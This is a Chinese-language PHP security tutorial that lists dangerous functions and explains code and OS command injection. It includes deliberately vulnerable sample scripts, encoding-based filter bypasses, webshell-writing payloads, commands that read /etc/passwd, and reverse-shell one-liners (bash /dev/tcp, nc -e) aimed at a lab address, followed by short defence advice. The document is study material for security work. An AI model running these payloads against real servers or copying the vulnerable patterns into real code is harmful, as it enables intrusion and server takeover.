PHP危险函数

PHP 中有一些函数是比较危险的,也是进行PHP 代码审计的时候需要重点关注的内容。

函数速查:

函数或语句或结构
eval()
assert()
preg_replace()
call_user_func()
call_user_func_array()
array_map()
$a($b)
system()
exec()
shell_exec()
passthru()
popen()
反引号

PHP 代码执行语句

  • 掌握PHP 代码执行的相关函数和语句

eval 语句

eval() 会将符合PHP 语法规范字符串当作php 代码执行。

代码示例

1
2
3
4
5
6
7
8
9
// eval.php

// $code = "phpinfo();";
$code = $_REQUEST['code'];

// echo $code;
// var_dump($code);

eval($code);

一句话木马原型。

如果参数进入eval() 语句之前,进行了过滤,例如过滤了单双引号,可以采用如下方法进行绕过:

  • ASCII 编码
1
2
3
4
5
system('whoami');

chr(115).chr(121).chr(115).chr(116).chr(101).chr(109).chr(40).chr(39).chr(119).chr(104).chr(111).chr(97).chr(109).chr(105).chr(39).chr(41).chr(59)

?code=eval(chr(115).chr(121).chr(115).chr(116).chr(101).chr(109).chr(40).chr(39).chr(119).chr(104).chr(111).chr(97).chr(109).chr(105).chr(39).chr(41).chr(59));
  • BASE64 编码
1
2
3
4
5
system('whoami');

c3lzdGVtKCd3aG9hbWknKTs=

?code=eval(base64_decode(c3lzdGVtKCd3aG9hbWknKTs));

说明

虽然可以以函数的方式调用eval(),但是eval() 不是PHP 的函数,是一种语法结构,不能动态调用。在eval() 执行的字符串要以分号结束。

其他命令执行的方式:

1
2
3
4
5
6
7
8
9
?code=phpinfo();

?code=${phpinfo()};

?code=xiu;phpinfo();

?code=?>xiu IS HANDSOME<?php phpinfo();

?code=eval(phpinfo());

assert 函数

assert() 会将字符串当做PHP 代码来执行。

代码示例

1
2
3
4
5
6
7
8
// assert.php

// $code = "phpinfo();";
$code = $_REQUEST['code'];

// var_dump($code);

assert($code);

说明

  • assert() 只能执行单条PHP 语句。
  • assert() 是一个函数,可以动态调用。
  • 高版本PHP 中,assert() 被弃用。

preg_replace 函数

preg_replace() 函数的作用是对字符串进行正则匹配后替换。

代码示例

搜索$subject 中匹配$pattern 的部分,以$replacement 进行替换。

1
2
3
4
5
6
7
// preg_replace.php

$code = preg_replace('~i~', 'I', 'xiu');
      
$code = preg_replace('~\[(.*)\]~e', '\\1', '[phpinfo()]');      

echo $code;

说明

  • preg_replace() 函数中第一个参数是正则表达式,e 是正则表达式的修饰符。

call_user_func

用于调用用户指定的可调用函数

1
2
3
4
5
6
7
function add($a, $b) {
    return $a + $b;
}

$result = call_user_func('add', 1, 2);
echo $result; // 输出:3

1
2
3
4
5
6
7
<?php
// call_user_func.php

$func = 'assert';
$arg = "phpinfo();";

call_user_func($func, $arg);

array_map

例如,有一个数组 arr1=array(1,2,3,4,5);arr1=array(1,2,3,4,5); 我们想要将每个数加上2并存储到另一个数组 arr2 中,可以使用 array_map:

1
2
3
4
5
6
7
8
function addTwo($n) {
    return $n + 2;
}

$arr1 = array(1, 2, 3, 4, 5);
$arr2 = array_map('addTwo', $arr1);

print_r($arr2); // 输出: Array ( [0] => 3 [1] => 4 [2] => 5 [3] => 6 [4] => 7 )
1
2
3
4
5
6
// array_map.php

$func = "assert";
$arg[] = "phpinfo();";

array_map($func, $arg);

动态函数

由于PHP 的特性原因,PHP 的函数支持直接由拼接的方式调用,这直接导致了PHP 在安全上的控制有加大了难度。不少知名程序中也用到了动态函数的写法,这种写法跟使用call_user_func() 的初衷一样,用来更加方便地调用函数,但是一旦过滤不严格就会造成代码执行漏洞。

1
2
3
4
5
6
7
<?php
// dynamic_function.php

$code = "phpinfo();";
$func = "assert";

$func($code);   // assert(phpinfo());

OS 命令执行函数

  • 掌握PHP 语言中系统命令执行函数

system 函数

system() 能够将字符串作为操作系统(Operator Sytstemc,OS)命令执行。在类似systemc() 函数调用系统命令时,PHP 会自动区分平台。

代码示例

1
2
3
4
5
6
// system.php 

// $cmd = "net user";
$cmd = $_REQUEST['cmd'];

system($cmd);

说明

  • 自带输出功能。
  • 自动区分系统平台。
1
2
3
4
5
?cmd=whoami

?cmd=ipconfig

?cmd=uname -a

exec 函数

代码示例

1
2
3
4
5
6
// exec.php 

// $cmd = "whoami";
$cmd = $_REQUEST['cmd'];

echo exec($cmd);

函数特点

  • 需要输出命令执行结果。
  • 只输出命令执行结果的最后一行,约等于没有回显。

shell_exec 函数

代码示例

1
2
3
4
5
6
// shell_exec.php 

// $cmd = "whoami";
$cmd = $_REQUEST['cmd'];

echo shell_exec($cmd);

说明

  • 需要输出命令执行结果。

passthru 函数

代码示例

1
2
3
4
5
6
// passthru.php 

// $cmd = "whoami";
$cmd = $_REQUEST['cmd'];

passthru($cmd);

说明

  • 自带输出功能。

popen 函数

代码示例

1
2
3
4
5
6
7
// popen.php 

$cmd = $_REQUEST['cmd'];

$result = popen($cmd, 'r');

echo fread($result, 1024);

说明

  • 函数返回值为文件指针,可以简单理解为文件名。

反引号

反引号` 内的字符串,会被解析成OS 命令。

代码示例

1
2
3
4
5
6
7
// ``.php

$cmd = "whoami";
$cmd = "ipconfig";
$cmd = "net user";

echo "<pre>".`$cmd`;

RCE

PHP 代码注入

原理

传入PHP 代码执行函数的变量,客户端可控,并且没有做严格的过滤。那么攻击者可以随意输入(注入,注射,Inject)他想要执行的代码,并且在服务器端执行。如果代码在服务器端执行成功,就认为存在PHP 代码注入漏洞,也就是RCE。

危害

Web 应用如果存在远程代码执行漏洞(RCE)是一件非常可怕的事情,攻击者通过RCE 继承Web 用户权限,执行任意(PHP)代码。

如果服务器没有正确配置,Web 用户权限比较高的话,就可以读写目标服务器任意文件内容,甚至控制整个网站以及服务器。

漏洞利用

代码执行漏洞的利用方式有很多种。

获取Shell,菜刀可以直接连接。

1
2
shell: http://127.0.0.1/eval.php
pass: code

获取当前文件的绝对路径。

1
?code=print(__FILE__);

读文件。

1
?code=print(file_get_contents('c:/windows/system32/drivers/etc/hosts'));

写文件。

1
?code=file_put_contents('shell.php','<?php phpinfo();?>');

OS 命令注入漏洞

原理

应用在调用这些函数执行系统命令的时候,如果将用户的输入作为系统命令的参数拼接到命令行中,在没有过滤用户的输入的情况下,就会造成命令执行漏洞。

漏洞危害

  • 继承Web 服务器程序权限,去执行系统命令;
  • 继承Web 服务器权限,读写文件;
  • 反弹Shell
  • 控制整个网站,控制整个服务器。

漏洞利用

OS 命令注入漏洞,攻击者直接继承Web 用户权限,在服务器上执行任意系统命令,危害特别大。

查看系统文件(读)。

1
2
?cmd=type c:\windows\system32\drivers\etc\hosts
?cmd=cat /etc/passwd

显示当前路径。

1
?cmd=cd

写文件。

1
2
3
?cmd=echo ^<^?php phpinfo();^?^> > shell.php
?cmd=echo ^<^?php @eval($_REQUEST[777])^?^> > shell.php
?cmd=echo PD89cGhwaW5mbygpPz4= | base64 -d > shell.php

执行某一个程序。

1
?cmd=c:\windows\system32\calc.exe

反弹Shell。

1
2
3
4
5
6
7
8
9
#   本机监听
nc -lnvp 1234

#   Linux 下反弹Shell      
?cmd=bash -i >& /dev/tcp/10.4.7.1/1234 0>&1
?cmd=echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC40LjcuMS8xMjM0IDA+JjE= | base64 -d | bash

#   Windows 反弹Shell
?cmd=nc.exe -e cmd.exe 10.4.7.1 1234

漏洞防御

  • 尽量不要使用eval 等危险函数,如果使用的话一定要进行严格的过滤。
  • preg_replace() 放弃使用e 修饰符。
  • 在php.ini 配置文件中disable_functions 中禁用。
1
disable_functions = system,assert
  • 参数的值尽量使用引号包裹,并在拼接前调用addslashes() 进行转义。